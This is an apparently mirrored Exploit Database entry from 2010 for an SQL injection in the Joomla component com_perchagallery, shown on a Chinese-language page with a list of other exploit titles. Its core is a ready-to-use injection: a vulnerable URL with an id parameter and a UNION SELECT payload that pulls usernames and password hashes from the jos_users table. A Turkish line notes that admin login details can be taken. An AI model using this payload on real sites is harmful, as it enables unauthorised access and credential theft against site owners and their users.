Joomla! Component com_perchagallery – SQL Injection

Exploit Database
12 阅读

作者： FL0RiX

日期： 2010-01-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11024/

########################################################################
# Joomla Component com_perchagallery SQL Injection Vulnerability

######################################################################## #
# Author :FL0RiX
#
# Name : com_perchagallery
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://localhost/index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
#
#EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/**/from/**/jos_users--
########################################################################

last Exploits
Joomla! Component com_perchagallery – SQL Injection的更多信息

LiveZilla 3.2.0.2 – ‘Track’ Module ‘server.php’ Cross-Site Scripting：
qEngine CMS 6.0.0 – Multiple Vulnerabilities：
WordPress Plugin wp-FileManager – Arbitrary File Download：
Xivo 1.2 – Arbitrary File Download：
Flogr – ‘tag’ Multiple Cross-Site Scripting Vulnerabilities：
WordPress Plugin Flip Book – ‘PHP.php’ Arbitrary File Upload：
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Authentication Bypass：
Blog:CMS 4.2.1 e – Multiple HTML Injections / Cross-Site Scripting：